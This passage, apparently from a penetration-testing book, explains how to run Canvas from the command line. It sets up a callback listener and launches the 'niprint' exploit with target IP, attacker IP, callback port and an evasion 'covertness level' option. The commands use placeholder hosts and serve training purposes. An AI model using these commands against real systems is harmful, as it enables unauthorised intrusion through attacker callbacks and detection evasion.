A GUI can be convenient, but running from a command line often allows more flexibility and can make it easier to achieve remote tasks. To use the command line, perform the following steps:
Set up the exploit callback listener. From the Canvas directory, use the command:
python commandlineInterface.py -p[CALLBACK PORT]-v[TARGET OS]
The -v option currently supports:
0 LINUXEXECVE 1 WIN32MOSDEF 2 LINUXMOSDEF 3 SOLARISMOSDEF 4 BSDMOSDEF 5 OSXMOSDEF 6 AIXMOSDEF 7 PHPMULTI
Launch the exploit directly by calling the exploit module in Python; for example, calling the niprint exploit would look like:
python ./exploits/niprint/niprint.py -v[OS TRAGERT VERSION]-t[TARGET IP]-p[TARGET PORT]-l[ATTACKER IP]-d[CALLBACK PORT]-T[TESTING MODE]-C[COVERTNESS LEVEL]
The options are listed in Table 9-3.
Table 9-3. Exploit options and their descriptions
Option | Description |
|---|---|
| The supported OS version; depends on the exploit. |
| Target IP address. |
| Target TCP/UDP port. |
| Attacker IP reachable from the target. |
| The call back port (the one given to CommandlineInterface.py). |
| Test the exploit, but do not run it. |
| Covertness level; the range is from 1 to 11, where 1 is no evasion and 11 is full evasion. |
Evasion can impact an exploit's reliability, so using more evasion is not always the correct solution. A compromise between evasion and reliability must be found for each target. The covertness level feature is mostly implemented in the transport layer using fragmentation or encoding.